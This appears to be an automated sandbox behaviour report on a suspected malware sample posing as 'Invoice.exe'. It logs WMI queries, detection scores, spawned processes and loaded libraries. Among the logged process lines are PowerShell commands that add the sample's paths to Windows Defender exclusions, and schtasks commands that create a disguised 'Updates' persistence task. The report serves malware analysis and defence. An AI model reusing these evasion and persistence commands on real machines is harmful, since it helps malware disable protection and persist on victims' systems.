Source: Invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Invoice.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Invoice.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: kaJNzBnxbXm.exe.0.dr, BjTxJte.exe.10.dr

Binary or memory string: UPDATE [AdventureWorksLT2008R2].[SalesLT].[Customer] SET FirstName = @firstName, LastName = @lastName, EmailAddress = @emailAddress, Title = @title, MiddleName = @middleName, Suffix = @suffix, CompanyName = @companyName, SalesPerson = @salesPerson, Phone = @phone, PasswordHash = @passwordHash, PasswordSalt = @passwordSalt, rowguid = @rowguid WHERE CustomerID = @CustomerID;SELECT * FROM [AdventureWorksLT2008R2].[SalesLT].[Customer] WHERE CustomerId = @CustomerID

Source: Invoice.exe	ReversingLabs: Detection: 50%
Source: Invoice.exe	Virustotal: Detection: 30%

Source: C:\Users\user\Desktop\Invoice.exe

File read: C:\Users\user\Desktop\Invoice.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process created: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpE34B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmp21D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp"
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Process created: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpE34B.tmp"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmp21D.tmp"
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Process created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"

Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
